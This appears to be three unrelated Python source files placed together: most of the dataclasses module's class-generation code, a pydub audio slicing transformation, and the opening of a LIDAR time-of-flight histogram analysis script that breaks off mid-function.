equivalent of 'x:int=3' (except instead of 'int', # reference a variable set to int, and instead of '3', reference a # variable set to 3). if f.default is MISSING and f.default_factory is MISSING: # There's no default, and no default_factory, just output the # variable name and type. default = '' elif f.default is not MISSING: # There's a default, this will be the name that's used to look # it up. default = f'=_dflt_{f.name}' elif f.default_factory is not MISSING: # There's a factory function. Set a marker. default = '=_HAS_DEFAULT_FACTORY' return f'{f.name}:_type_{f.name}{default}' def _init_fn(fields, std_fields, kw_only_fields, frozen, has_post_init, self_name, globals): # fields contains both real fields and InitVar pseudo-fields. # Make sure we don't have fields without defaults following fields # with defaults. This actually would be caught when exec-ing the # function source code, but catching it here gives a better error # message, and future-proofs us in case we build up the function # using ast. seen_default = False for f in std_fields: # Only consider the non-kw-only fields in the __init__ call. if f.init: if not (f.default is MISSING and f.default_factory is MISSING): seen_default = True elif seen_default: raise TypeError(f'non-default argument {f.name!r} ' 'follows default argument') locals = {f'_type_{f.name}': f.type for f in fields} locals.update({ 'MISSING': MISSING, '_HAS_DEFAULT_FACTORY': _HAS_DEFAULT_FACTORY, }) body_lines = [] for f in fields: line = _field_init(f, frozen, locals, self_name) # line is None means that this field doesn't require # initialization (it's a pseudo-field). Just skip it. if line: body_lines.append(line) # Does this class have a post-init function? 
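    # If so, the generated __init__ ends with a call along the lines of
    # "self.__post_init__(iv1,iv2)", where only the InitVar
    # pseudo-fields are passed through as arguments.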
    if has_post_init:
        params_str = ','.join(f.name for f in fields
                              if f._field_type is _FIELD_INITVAR)
        body_lines.append(f'{self_name}.{_POST_INIT_NAME}({params_str})')

    # If no body lines, use 'pass'.
    if not body_lines:
        body_lines = ['pass']

    _init_params = [_init_param(f) for f in std_fields]
    if kw_only_fields:
        # Add the keyword-only args.  Because the * can only be added if
        # there's at least one keyword-only arg, there needs to be a test here
        # (instead of just concatenating the lists together).
        _init_params += ['*']
        _init_params += [_init_param(f) for f in kw_only_fields]
    return _create_fn('__init__',
                      [self_name] + _init_params,
                      body_lines,
                      locals=locals,
                      globals=globals,
                      return_type=None)


def _repr_fn(fields, globals):
    fn = _create_fn('__repr__',
                    ('self',),
                    ['return self.__class__.__qualname__ + f"(' +
                     ', '.join([f"{f.name}={{self.{f.name}!r}}"
                                for f in fields]) +
                     ')"'],
                    globals=globals)
    return _recursive_repr(fn)


def _frozen_get_del_attr(cls, fields, globals):
    locals = {'cls': cls,
              'FrozenInstanceError': FrozenInstanceError}
    if fields:
        fields_str = '(' + ','.join(repr(f.name) for f in fields) + ',)'
    else:
        # Special case for the zero-length tuple.
        fields_str = '()'
    return (_create_fn('__setattr__',
                       ('self', 'name', 'value'),
                       (f'if type(self) is cls or name in {fields_str}:',
                        ' raise FrozenInstanceError(f"cannot assign to field {name!r}")',
                        f'super(cls, self).__setattr__(name, value)'),
                       locals=locals,
                       globals=globals),
            _create_fn('__delattr__',
                       ('self', 'name'),
                       (f'if type(self) is cls or name in {fields_str}:',
                        ' raise FrozenInstanceError(f"cannot delete field {name!r}")',
                        f'super(cls, self).__delattr__(name)'),
                       locals=locals,
                       globals=globals),
            )


def _cmp_fn(name, op, self_tuple, other_tuple, globals):
    # Create a comparison function.  If the fields in the object are
    # named 'x' and 'y', then self_tuple is the string
    # '(self.x,self.y)' and other_tuple is the string
    # '(other.x,other.y)'.
    return _create_fn(name,
                      ('self', 'other'),
                      ['if other.__class__ is self.__class__:',
                       f' return {self_tuple}{op}{other_tuple}',
                       'return NotImplemented'],
                      globals=globals)


def _hash_fn(fields, globals):
    self_tuple = _tuple_str('self', fields)
    return _create_fn('__hash__',
                      ('self',),
                      [f'return hash({self_tuple})'],
                      globals=globals)


def _is_classvar(a_type, typing):
    # This test uses a typing internal class, but it's the best way to
    # test if this is a ClassVar.
    return (a_type is typing.ClassVar
            or (type(a_type) is typing._GenericAlias
                and a_type.__origin__ is typing.ClassVar))


def _is_initvar(a_type, dataclasses):
    # The module we're checking against is the module we're
    # currently in (dataclasses.py).
    return (a_type is dataclasses.InitVar
            or type(a_type) is dataclasses.InitVar)


def _is_kw_only(a_type, dataclasses):
    return a_type is dataclasses.KW_ONLY


def _is_type(annotation, cls, a_module, a_type, is_type_predicate):
    # Given a type annotation string, does it refer to a_type in
    # a_module?  For example, when checking that annotation denotes a
    # ClassVar, then a_module is typing, and a_type is
    # typing.ClassVar.

    # It's possible to look up a_module given a_type, but it involves
    # looking in sys.modules (again!), and seems like a waste since
    # the caller already knows a_module.

    # - annotation is a string type annotation
    # - cls is the class that this annotation was found in
    # - a_module is the module we want to match
    # - a_type is the type in that module we want to match
    # - is_type_predicate is a function called with (obj, a_module)
    #   that determines if obj is of the desired type.
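    # For example (illustrative), for the annotation string
    # "typing.ClassVar[int]" the regex match below yields
    # match.group(1) == 'typing' and match.group(2) == 'ClassVar';
    # for a plain "ClassVar[int]", group(1) is None.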
# Since this test does not do a local namespace lookup (and # instead only a module (global) lookup), there are some things it # gets wrong. # With string annotations, cv0 will be detected as a ClassVar: # CV = ClassVar # @dataclass # class C0: # cv0: CV # But in this example cv1 will not be detected as a ClassVar: # @dataclass # class C1: # CV = ClassVar # cv1: CV # In C1, the code in this function (_is_type) will look up "CV" in # the module and not find it, so it will not consider cv1 as a # ClassVar. This is a fairly obscure corner case, and the best # way to fix it would be to eval() the string "CV" with the # correct global and local namespaces. However that would involve # a eval() penalty for every single field of every dataclass # that's defined. It was judged not worth it. match = _MODULE_IDENTIFIER_RE.match(annotation) if match: ns = None module_name = match.group(1) if not module_name: # No module name, assume the class's module did # "from dataclasses import InitVar". ns = sys.modules.get(cls.__module__).__dict__ else: # Look up module_name in the class's module. module = sys.modules.get(cls.__module__) if module and module.__dict__.get(module_name) is a_module: ns = sys.modules.get(a_type.__module__).__dict__ if ns and is_type_predicate(ns.get(match.group(2)), a_module): return True return False def _get_field(cls, a_name, a_type, default_kw_only): # Return a Field object for this field name and type. ClassVars and # InitVars are also returned, but marked as such (see f._field_type). # default_kw_only is the value of kw_only to use if there isn't a field() # that defines it. # If the default value isn't derived from Field, then it's only a # normal default value. Convert it to a Field(). default = getattr(cls, a_name, MISSING) if isinstance(default, Field): f = default else: if isinstance(default, types.MemberDescriptorType): # This is a field in __slots__, so it has no default value. default = MISSING f = field(default=default) # Only at this point do we know the name and the type. Set them. f.name = a_name f.type = a_type # Assume it's a normal field until proven otherwise. We're next # going to decide if it's a ClassVar or InitVar, everything else # is just a normal field. f._field_type = _FIELD # In addition to checking for actual types here, also check for # string annotations. get_type_hints() won't always work for us # (see https://github.com/python/typing/issues/508 for example), # plus it's expensive and would require an eval for every string # annotation. So, make a best effort to see if this is a ClassVar # or InitVar using regex's and checking that the thing referenced # is actually of the correct type. # For the complete discussion, see https://bugs.python.org/issue33453 # If typing has not been imported, then it's impossible for any # annotation to be a ClassVar. So, only look for ClassVar if # typing has been imported by any module (not necessarily cls's # module). typing = sys.modules.get('typing') if typing: if (_is_classvar(a_type, typing) or (isinstance(f.type, str) and _is_type(f.type, cls, typing, typing.ClassVar, _is_classvar))): f._field_type = _FIELD_CLASSVAR # If the type is InitVar, or if it's a matching string annotation, # then it's an InitVar. if f._field_type is _FIELD: # The module we're checking against is the module we're # currently in (dataclasses.py). 
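        # As illustrative examples, both an actual InitVar[int]
        # annotation and the string forms 'InitVar[int]' or
        # 'dataclasses.InitVar[int]' are detected here.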
dataclasses = sys.modules[__name__] if (_is_initvar(a_type, dataclasses) or (isinstance(f.type, str) and _is_type(f.type, cls, dataclasses, dataclasses.InitVar, _is_initvar))): f._field_type = _FIELD_INITVAR # Validations for individual fields. This is delayed until now, # instead of in the Field() constructor, since only here do we # know the field name, which allows for better error reporting. # Special restrictions for ClassVar and InitVar. if f._field_type in (_FIELD_CLASSVAR, _FIELD_INITVAR): if f.default_factory is not MISSING: raise TypeError(f'field {f.name} cannot have a ' 'default factory') # Should I check for other field settings? default_factory # seems the most serious to check for. Maybe add others. For # example, how about init=False (or really, # init=<not-the-default-init-value>)? It makes no sense for # ClassVar and InitVar to specify init=<anything>. # kw_only validation and assignment. if f._field_type in (_FIELD, _FIELD_INITVAR): # For real and InitVar fields, if kw_only wasn't specified use the # default value. if f.kw_only is MISSING: f.kw_only = default_kw_only else: # Make sure kw_only isn't set for ClassVars assert f._field_type is _FIELD_CLASSVAR if f.kw_only is not MISSING: raise TypeError(f'field {f.name} is a ClassVar but specifies ' 'kw_only') # For real fields, disallow mutable defaults for known types. if f._field_type is _FIELD and isinstance(f.default, (list, dict, set)): raise ValueError(f'mutable default {type(f.default)} for field ' f'{f.name} is not allowed: use default_factory') return f def _set_qualname(cls, value): # Ensure that the functions returned from _create_fn uses the proper # __qualname__ (the class they belong to). if isinstance(value, FunctionType): value.__qualname__ = f"{cls.__qualname__}.{value.__name__}" return value def _set_new_attribute(cls, name, value): # Never overwrites an existing attribute. Returns True if the # attribute already exists. if name in cls.__dict__: return True _set_qualname(cls, value) setattr(cls, name, value) return False # Decide if/how we're going to create a hash function. Key is # (unsafe_hash, eq, frozen, does-hash-exist). Value is the action to # take. The common case is to do nothing, so instead of providing a # function that is a no-op, use None to signify that. def _hash_set_none(cls, fields, globals): return None def _hash_add(cls, fields, globals): flds = [f for f in fields if (f.compare if f.hash is None else f.hash)] return _set_qualname(cls, _hash_fn(flds, globals)) def _hash_exception(cls, fields, globals): # Raise an exception. raise TypeError(f'Cannot overwrite attribute __hash__ ' f'in class {cls.__name__}') # # +-------------------------------------- unsafe_hash? # | +------------------------------- eq? # | | +------------------------ frozen? # | | | +---------------- has-explicit-hash? 
# | | | | # | | | | +------- action # | | | | | # v v v v v _hash_action = {(False, False, False, False): None, (False, False, False, True ): None, (False, False, True, False): None, (False, False, True, True ): None, (False, True, False, False): _hash_set_none, (False, True, False, True ): None, (False, True, True, False): _hash_add, (False, True, True, True ): None, (True, False, False, False): _hash_add, (True, False, False, True ): _hash_exception, (True, False, True, False): _hash_add, (True, False, True, True ): _hash_exception, (True, True, False, False): _hash_add, (True, True, False, True ): _hash_exception, (True, True, True, False): _hash_add, (True, True, True, True ): _hash_exception, } # See https://bugs.python.org/issue32929#msg312829 for an if-statement # version of this table. def _process_class(cls, init, repr, eq, order, unsafe_hash, frozen, match_args, kw_only, slots): # Now that dicts retain insertion order, there's no reason to use # an ordered dict. I am leveraging that ordering here, because # derived class fields overwrite base class fields, but the order # is defined by the base class, which is found first. fields = {} if cls.__module__ in sys.modules: globals = sys.modules[cls.__module__].__dict__ else: # Theoretically this can happen if someone writes # a custom string to cls.__module__. In which case # such dataclass won't be fully introspectable # (w.r.t. typing.get_type_hints) but will still function # correctly. globals = {} setattr(cls, _PARAMS, _DataclassParams(init, repr, eq, order, unsafe_hash, frozen)) # Find our base classes in reverse MRO order, and exclude # ourselves. In reversed order so that more derived classes # override earlier field definitions in base classes. As long as # we're iterating over them, see if any are frozen. any_frozen_base = False has_dataclass_bases = False for b in cls.__mro__[-1:0:-1]: # Only process classes that have been processed by our # decorator. That is, they have a _FIELDS attribute. base_fields = getattr(b, _FIELDS, None) if base_fields is not None: has_dataclass_bases = True for f in base_fields.values(): fields[f.name] = f if getattr(b, _PARAMS).frozen: any_frozen_base = True # Annotations that are defined in this class (not in base # classes). If __annotations__ isn't present, then this class # adds no new annotations. We use this to compute fields that are # added by this class. # # Fields are found from cls_annotations, which is guaranteed to be # ordered. Default values are from class attributes, if a field # has a default. If the default value is a Field(), then it # contains additional info beyond (and possibly including) the # actual default value. Pseudo-fields ClassVars and InitVars are # included, despite the fact that they're not real fields. That's # dealt with later. cls_annotations = cls.__dict__.get('__annotations__', {}) # Now find fields in our class. While doing so, validate some # things, and set the default values (as class attributes) where # we can. cls_fields = [] # Get a reference to this module for the _is_kw_only() test. KW_ONLY_seen = False dataclasses = sys.modules[__name__] for name, type in cls_annotations.items(): # See if this is a marker to change the value of kw_only. if (_is_kw_only(type, dataclasses) or (isinstance(type, str) and _is_type(type, cls, dataclasses, dataclasses.KW_ONLY, _is_kw_only))): # Switch the default to kw_only=True, and ignore this # annotation: it's not a real field. 
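            # Illustrative sketch (assumed usage) of the marker:
            #
            #     @dataclass
            #     class Point:
            #         x: float
            #         _: KW_ONLY
            #         y: float   # y (and later fields) become keyword-only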
            if KW_ONLY_seen:
                raise TypeError(f'{name!r} is KW_ONLY, but KW_ONLY '
                                'has already been specified')
            KW_ONLY_seen = True
            kw_only = True
        else:
            # Otherwise it's a field of some type.
            cls_fields.append(_get_field(cls, name, type, kw_only))

    for f in cls_fields:
        fields[f.name] = f

        # If the class attribute (which is the default value for this
        # field) exists and is of type 'Field', replace it with the
        # real default.  This is so that normal class introspection
        # sees a real default value, not a Field.
        if isinstance(getattr(cls, f.name, None), Field):
            if f.default is MISSING:
                # If there's no default, delete the class attribute.
                # This happens if we specify field(repr=False), for
                # example (that is, we specified a field object, but
                # no default value).  Also if we're using a default
                # factory.  The class attribute should not be set at
                # all in the post-processed class.
                delattr(cls, f.name)
            else:
                setattr(cls, f.name, f.default)

    # Do we have any Field members that don't also have annotations?
    for name, value in cls.__dict__.items():
        if isinstance(value, Field) and name not in cls_annotations:
            raise TypeError(f'{name!r} is a field but has no type annotation')

    # Check rules that apply if we are derived from any dataclasses.
    if has_dataclass_bases:
        # Raise an exception if any of our bases are frozen, but we're not.
        if any_frozen_base and not frozen:
            raise TypeError('cannot inherit non-frozen dataclass from a '
                            'frozen one')

        # Raise an exception if we're frozen, but none of our bases are.
        if not any_frozen_base and frozen:
            raise TypeError('cannot inherit frozen dataclass from a '
                            'non-frozen one')

    # Remember all of the fields on our class (including bases).  This
    # also marks this class as being a dataclass.
    setattr(cls, _FIELDS, fields)

    # Was this class defined with an explicit __hash__?  Note that if
    # __eq__ is defined in this class, then python will automatically
    # set __hash__ to None.  This is a heuristic, as it's possible
    # that such a __hash__ == None was not auto-generated, but it's
    # close enough.
    class_hash = cls.__dict__.get('__hash__', MISSING)
    has_explicit_hash = not (class_hash is MISSING or
                             (class_hash is None and '__eq__' in cls.__dict__))

    # If we're generating ordering methods, we must be generating the
    # eq methods.
    if order and not eq:
        raise ValueError('eq must be true if order is true')

    # Include InitVars and regular fields (so, not ClassVars).  This is
    # initialized here, outside of the "if init:" test, because std_init_fields
    # is used with match_args, below.
    all_init_fields = [f for f in fields.values()
                       if f._field_type in (_FIELD, _FIELD_INITVAR)]
    (std_init_fields,
     kw_only_init_fields) = _fields_in_init_order(all_init_fields)

    if init:
        # Does this class have a post-init function?
        has_post_init = hasattr(cls, _POST_INIT_NAME)

        _set_new_attribute(cls, '__init__',
                           _init_fn(all_init_fields,
                                    std_init_fields,
                                    kw_only_init_fields,
                                    frozen,
                                    has_post_init,
                                    # The name to use for the "self"
                                    # param in __init__.  Use "self"
                                    # if possible.
                                    '__dataclass_self__' if 'self' in fields
                                        else 'self',
                                    globals,
                                    ))

    # Get the fields as a list, and include only real fields.  This is
    # used in all of the following methods.
    field_list = [f for f in fields.values() if f._field_type is _FIELD]

    if repr:
        flds = [f for f in field_list if f.repr]
        _set_new_attribute(cls, '__repr__', _repr_fn(flds, globals))

    if eq:
        # Create __eq__ method.  There's no need for a __ne__ method,
        # since python will call __eq__ and negate it.
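        # (The generated method returns NotImplemented for instances of
        # other classes, so Python can fall back to the reflected
        # comparison; see _cmp_fn above.)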
        flds = [f for f in field_list if f.compare]
        self_tuple = _tuple_str('self', flds)
        other_tuple = _tuple_str('other', flds)
        _set_new_attribute(cls, '__eq__',
                           _cmp_fn('__eq__', '==',
                                   self_tuple, other_tuple,
                                   globals=globals))

    if order:
        # Create and set the ordering methods.
        flds = [f for f in field_list if f.compare]
        self_tuple = _tuple_str('self', flds)
        other_tuple = _tuple_str('other', flds)
        for name, op in [('__lt__', '<'),
                         ('__le__', '<='),
                         ('__gt__', '>'),
                         ('__ge__', '>='),
                         ]:
            if _set_new_attribute(cls, name,
                                  _cmp_fn(name, op, self_tuple, other_tuple,
                                          globals=globals)):
                raise TypeError(f'Cannot overwrite attribute {name} '
                                f'in class {cls.__name__}. Consider using '
                                'functools.total_ordering')

    if frozen:
        for fn in _frozen_get_del_attr(cls, field_list, globals):
            if _set_new_attribute(cls, fn.__name__, fn):
                raise TypeError(f'Cannot overwrite attribute {fn.__name__} '
                                f'in class {cls.__name__}')

    # Decide if/how we're going to create a hash function.
    hash_action = _hash_action[bool(unsafe_hash),
                               bool(eq),
                               bool(frozen),
                               has_explicit_hash]
    if hash_action:
        # No need to call _set_new_attribute here, since by the time
        # we're here the overwriting is unconditional.
        cls.__hash__ = hash_action(cls, field_list, globals)

    if not getattr(cls, '__doc__'):
        # Create a class doc-string.
        cls.__doc__ = (cls.__name__ +
                       str(inspect.signature(cls)).replace(' -> None', ''))

    if match_args:
        # I could probably compute this once
        _set_new_attribute(cls, '__match_args__',
                           tuple(f.name for f in std_init_fields))

    if slots:
        cls = _add_slots(cls, frozen)

    abc.update_abstractmethods(cls)

    return cls


# _dataclass_getstate and _dataclass_setstate are needed for pickling frozen
# classes with slots.  These could be slightly more performant if we generated
# the code instead of iterating over fields.  But that can be a project for
# another day, if performance becomes an issue.
def _dataclass_getstate(self):
    return [getattr(self, f.name) for f in fields(self)]


def _dataclass_setstate(self, state):
    for field, value in zip(fields(self), state):
        # use setattr because dataclass may be frozen
        object.__setattr__(self, field.name, value)


def _add_slots(cls, is_frozen):
    # Need to create a new class, since we can't set __slots__
    # after a class has been created.

    # Make sure __slots__ isn't already set.
    if '__slots__' in cls.__dict__:
        raise TypeError(f'{cls.__name__} already specifies __slots__')

    # Create a new dict for our new class.
    cls_dict = dict(cls.__dict__)
    field_names = tuple(f.name for f in fields(cls))
    cls_dict['__slots__'] = field_names
    for field_name in field_names:
        # Remove our attributes, if present.  The member descriptors
        # that type() creates for __slots__ will take their place.
        cls_dict.pop(field_name, None)

    # Remove __dict__ itself.
    cls_dict.pop('__dict__', None)

    # And finally create the class.
    qualname = getattr(cls, '__qualname__', None)
    cls = type(cls)(cls.__name__, cls.__bases__, cls_dict)
    if qualname is not None:
        cls.__qualname__ = qualname

    if is_frozen:
        # Need this for pickling frozen classes with slots.
        cls.__getstate__ = _dataclass_getstate
        cls.__setstate__ = _dataclass_setstate

    return cls


def dataclass(cls=None, /, *, init=True, repr=True, eq=True, order=False,
              unsafe_hash=False, frozen=False, match_args=True,
              kw_only=False, slots=False):
    """Returns the same class as was passed in, with dunder methods
    added based on the fields defined in the class.

    Examines PEP 526 __annotations__ to determine fields.

    If init is true, an __init__() method is added to the class. If
    repr is true, a __repr__() method is added.
    If order is true, rich comparison dunder methods are added. If
    unsafe_hash is true, a __hash__() method function is added. If
    frozen is true, fields may not be assigned to after instance
    creation. If match_args is true, the __match_args__ tuple is
    added. If kw_only is true, then by default all fields are
    keyword-only. If slots is true, a __slots__ attribute is added.
    """

    def wrap(cls):
        return _process_class(cls, init, repr, eq, order, unsafe_hash,
                              frozen, match_args, kw_only, slots)

    # See if we're being called as @dataclass or @dataclass().
    if cls is None:
        # We're called with parens.
        return wrap

    # We're called as @dataclass without parens.
    return wrap(cls)


def fields(class_or_instance):
    """Return a tuple describing the fields of this dataclass.

    Accepts a dataclass or an instance of one. Tuple elements are of
    type Field.
    """

    # Might it be worth caching this, per class?
    try:
        fields = getattr(class_or_instance, _FIELDS)
    except AttributeError:
        raise TypeError('must be called with a dataclass type or instance')

    # Exclude pseudo-fields.  Note that fields is sorted by insertion
    # order, so the order of the tuple is as the fields were defined.
    return tuple(f for f in fields.values() if f._field_type is _FIELD)


def _is_dataclass_instance(obj):
    """Returns True if obj is an instance of a dataclass."""
    return hasattr(type(obj), _FIELDS)


def is_dataclass(obj):
    """Returns True if obj is a dataclass or an instance of a
    dataclass."""
    cls = obj if isinstance(obj, type) else type(obj)
    return hasattr(cls, _FIELDS)


def asdict(obj, *, dict_factory=dict):
    """Return the fields of a dataclass instance as a new dictionary mapping
    field names to field values.

    Example usage:

      @dataclass
      class C:
          x: int
          y: int

      c = C(1, 2)
      assert asdict(c) == {'x': 1, 'y': 2}

    If given, 'dict_factory' will be used instead of built-in dict.
    The function applies recursively to field values that are
    dataclass instances. This will also look into built-in containers:
    tuples, lists, and dicts.
    """
    if not _is_dataclass_instance(obj):
        raise TypeError("asdict() should be called on dataclass instances")
    return _asdict_inner(obj, dict_factory)


def _asdict_inner(obj, dict_factory):
    if _is_dataclass_instance(obj):
        result = []
        for f in fields(obj):
            value = _asdict_inner(getattr(obj, f.name), dict_factory)
            result.append((f.name, value))
        return dict_factory(result)
    elif isinstance(obj, tuple) and hasattr(obj, '_fields'):
        # obj is a namedtuple.  Recurse into it, but the returned
        # object is another namedtuple of the same type.  This is
        # similar to how other list- or tuple-derived classes are
        # treated (see below), but we just need to create them
        # differently because a namedtuple's __init__ needs to be
        # called differently (see bpo-34363).

        # I'm not using namedtuple's _asdict()
        # method, because:
        # - it does not recurse into the namedtuple fields and
        #   convert them to dicts (using dict_factory).
        # - I don't actually want to return a dict here.  The main
        #   use case here is json.dumps, and it handles converting
        #   namedtuples to lists.  Admittedly we're losing some
        #   information here when we produce a json list instead of a
        #   dict.  Note that if we returned dicts here instead of
        #   namedtuples, we could no longer call asdict() on a data
        #   structure where a namedtuple was used as a dict key.
        return type(obj)(*[_asdict_inner(v, dict_factory) for v in obj])
    elif isinstance(obj, (list, tuple)):
        # Assume we can create an object of this type by passing in a
        # generator (which is not true for namedtuples, handled
        # above).
return type(obj)(_asdict_inner(v, dict_factory) for v in obj) elif isinstance(obj, dict): return type(obj)((_asdict_inner(k, dict_factory), _asdict_inner(v, dict_factory)) for k, v in obj.items()) else: return copy.deepcopy(obj) def astuple(obj, *, tuple_factory=tuple): """Return the fields of a dataclass instance as a new tuple of field values. Example usage:: @dataclass class C: x: int y: int c = C(1, 2) assert astuple(c) == (1, 2) If given, 'tuple_factory' will be used instead of built-in tuple. The function applies recursively to field values that are dataclass instances. This will also look into built-in containers: tuples, lists, and dicts. """ if not _is_dataclass_instance(obj): raise TypeError("astuple() should be called on dataclass instances") return _astuple_inner(obj, tuple_factory) def _astuple_inner(obj, tuple_factory): if _is_dataclass_instance(obj): result = [] for f in fields(obj): value = _astuple_inner(getattr(obj, f.name), tuple_factory) result.append(value) return tuple_factory(result) elif isinstance(obj, tuple) and hasattr(obj, '_fields'): # obj is a namedtuple. Recurse into it, but the returned # object is another namedtuple of the same type. This is # similar to how other list- or tuple-derived classes are # treated (see below), but we just need to create them # differently because a namedtuple's __init__ needs to be # called differently (see bpo-34363). return type(obj)(*[_astuple_inner(v, tuple_factory) for v in obj]) elif isinstance(obj, (list, tuple)): # Assume we can create an object of this type by passing in a # generator (which is not true for namedtuples, handled # above). return type(obj)(_astuple_inner(v, tuple_factory) for v in obj) elif isinstance(obj, dict): return type(obj)((_astuple_inner(k, tuple_factory), _astuple_inner(v, tuple_factory)) for k, v in obj.items()) else: return copy.deepcopy(obj) def make_dataclass(cls_name, fields, *, bases=(), namespace=None, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False, match_args=True, slots=False): """Return a new dynamically created dataclass. The dataclass name will be 'cls_name'. 'fields' is an iterable of either (name), (name, type) or (name, type, Field) objects. If type is omitted, use the string 'typing.Any'. Field objects are created by the equivalent of calling 'field(name, type [, Field-info])'. C = make_dataclass('C', ['x', ('y', int), ('z', int, field(init=False))], bases=(Base,)) is equivalent to: @dataclass class C(Base): x: 'typing.Any' y: int z: int = field(init=False) For the bases and namespace parameters, see the builtin type() function. The parameters init, repr, eq, order, unsafe_hash, and frozen are passed to dataclass(). """ if namespace is None: namespace = {} # While we're looking through the field names, validate that they # are identifiers, are not keywords, and not duplicates. seen = set() annotations = {} defaults = {} for item in fields: if isinstance(item, str): name = item tp = 'typing.Any' elif len(item) == 2: name, tp, = item elif len(item) == 3: name, tp, spec = item defaults[name] = spec else: raise TypeError(f'Invalid field: {item!r}') if not isinstance(name, str) or not name.isidentifier(): raise TypeError(f'Field names must be valid identifiers: {name!r}') if keyword.iskeyword(name): raise TypeError(f'Field names must not be keywords: {name!r}') if name in seen: raise TypeError(f'Field name duplicated: {name!r}') seen.add(name) annotations[name] = tp # Update 'ns' with the user-supplied namespace plus our calculated values. 
    def exec_body_callback(ns):
        ns.update(namespace)
        ns.update(defaults)
        ns['__annotations__'] = annotations

    # We use `types.new_class()` instead of simply `type()` to allow dynamic
    # creation of generic dataclasses.
    cls = types.new_class(cls_name, bases, {}, exec_body_callback)

    # Apply the normal decorator.
    return dataclass(cls, init=init, repr=repr, eq=eq, order=order,
                     unsafe_hash=unsafe_hash, frozen=frozen,
                     match_args=match_args, slots=slots)


def replace(obj, /, **changes):
    """Return a new object replacing specified fields with new values.

    This is especially useful for frozen classes.  Example usage:

      @dataclass(frozen=True)
      class C:
          x: int
          y: int

      c = C(1, 2)
      c1 = replace(c, x=3)
      assert c1.x == 3 and c1.y == 2
    """

    # We're going to mutate 'changes', but that's okay because it's a
    # new dict, even if called with 'replace(obj, **my_changes)'.
    if not _is_dataclass_instance(obj):
        raise TypeError("replace() should be called on dataclass instances")

    # It's an error to have init=False fields in 'changes'.
    # If a field is not in 'changes', read its value from the provided obj.
    for f in getattr(obj, _FIELDS).values():
        # Only consider normal fields or InitVars.
        if f._field_type is _FIELD_CLASSVAR:
            continue

        if not f.init:
            # Error if this field is specified in changes.
            if f.name in changes:
                raise ValueError(f'field {f.name} is declared with '
                                 'init=False, it cannot be specified with '
                                 'replace()')
            continue

        if f.name not in changes:
            if f._field_type is _FIELD_INITVAR and f.default is MISSING:
                raise ValueError(f"InitVar {f.name!r} "
                                 'must be specified with replace()')
            changes[f.name] = getattr(obj, f.name)

    # Create the new object, which calls __init__() and
    # __post_init__() (if defined), using all of the init fields we've
    # added and/or left in 'changes'.  If there are values supplied in
    # changes that aren't fields, this will correctly raise a
    # TypeError.
    return obj.__class__(**changes)
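# Illustrative sketch (not part of the module above): with frozen=True and
# slots=True, the generated __getstate__/__setstate__ hooks shown earlier are
# what make pickling work, since a slotted class has no __dict__ to serialize.
# Assumes Python 3.10+, where dataclass() accepts the slots argument; the
# class and variable names here are hypothetical.
import pickle
from dataclasses import dataclass as _dc

@_dc(frozen=True, slots=True)
class _Point:
    x: int
    y: int

_p = _Point(1, 2)
assert pickle.loads(pickle.dumps(_p)) == _p  # round-trips via the state hooks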
from dataclasses import dataclass from typing import Optional from pydub import AudioSegment from cyberpunk.exceptions import ( TransformationInputParseException, TransformationProcessException, ) from cyberpunk.transformations import TransformationInput @dataclass class SliceInput: start: Optional[int] end: Optional[int] @classmethod def from_str(cls, arg: str): try: start_str, end_str = tuple(arg.split(":")) start = int(start_str) if start_str != "" else None end = int(end_str) if end_str != "" else None except Exception as e: raise TransformationInputParseException(e) else: return SliceInput( start=start, end=end, ) def __iter__(self): yield "start", self.start yield "end", self.end def __str__(self): return f"{self.start if self.start is not None else ''}:{self.end if self.end is not None else ''}" class Slice: def __call__( self, segment: AudioSegment, inputs: TransformationInput, ) -> AudioSegment: return self.run(segment, inputs) def run( self, segment: AudioSegment, inputs: TransformationInput, ) -> AudioSegment: try: assert isinstance(inputs, SliceInput) start = inputs.start end = inputs.end if start is None and end is None: raise TransformationProcessException( "the start and end of a slice can't both be None", ) if start is None: sliced_segment = segment[:end] elif end is None: sliced_segment = segment[start:] else: sliced_segment = segment[start:end] except Exception as e: raise TransformationProcessException(e) else: return sliced_segment
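# Hypothetical usage of the transformation above; "example.mp3" is a stand-in
# for any local audio file (pydub also needs ffmpeg installed). pydub slices
# AudioSegments by millisecond, so "1000:5000" keeps the audio between 1 s
# and 5 s; len() of an AudioSegment is its duration in ms.
from pydub import AudioSegment

inputs = SliceInput.from_str("1000:5000")    # SliceInput(start=1000, end=5000)
segment = AudioSegment.from_file("example.mp3")
sliced = Slice()(segment, inputs)
print(str(inputs), len(sliced))              # "1000:5000" 4000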
#------IMPORTS-----
#Packages for ETA backend
import json
import etabackend.eta #Available at: https://github.com/timetag/ETA, https://eta.readthedocs.io/en/latest/
import etabackend.tk as etatk

#Packages used for analysis
import numpy as np
from pathlib import Path
import os
import time as t

import LIDAR_lib as lidar #Contains functions for 3D analysis
import intensity_map


def ToF_analysis(timetag_file, recipe_file, ch_sel, **kwargs):
    load_start = t.time()
    #Load the recipe from a separate ETA file
    with open(recipe_file, 'r') as filehandle:
        recipe_obj = json.load(filehandle)

    eta_engine = etabackend.eta.ETA()
    eta_engine.load_recipe(recipe_obj)

    #Set parameters in the recipe
    for arg in kwargs:
        eta_engine.recipe.set_parameter(arg, str(kwargs[arg]))
    """
    eta_engine.recipe.set_parameter("binsize", str(binsize))
    eta_engine.recipe.set_parameter("bins", str(bins))
    eta_engine.recipe.set_parameter("sync_delay", str(sync_delay))
    eta_engine.recipe.set_parameter("dimX", str(dimX))
    eta_engine.recipe.set_parameter("dimY", str(dimY))
    """
    eta_engine.load_recipe()
    load_time = t.time() - load_start

    #---File handling---
    file = Path(timetag_file)

    #------ETA PROCESSING-----
    START = t.time()
    """
    Code block loads the time-tagging data and runs the ETA script
    to generate ToF histograms
    """
    TOF_anal_start = t.time()
    print("Starting TOF analysis")
    cutfile = eta_engine.clips(file)
    result = eta_engine.run({"timetagger1": cutfile}, group='quTAG') #Runs the time tagging analysis and generates histograms
    histogram = result[ch_sel] #Selects the intended output from ETA; in this case it returns a 2-d array: the y axis for all ToF histograms. The x axis must be recreated separately
    TOF_anal_time = t.time() - TOF_anal_start
    print(f"Number of histograms produced: {result['pixelnumber']+1}")

    return histogram, START, load_time, TOF_anal_time


#--------------- Analysing the ToF histograms -----------
def analyse_3d(histogram, index_cutoff, index_ref, x_deg, y_deg, time, method = 'peak', background = 6, delay = 0):
    METHODS = {'peak': lidar.peak_distance, 'gauss': lidar.gauss}
    anal = METHODS[method]

    print("Starting 3D analysis")
    d_data = {} #used to store the distance data
    i_data = {}
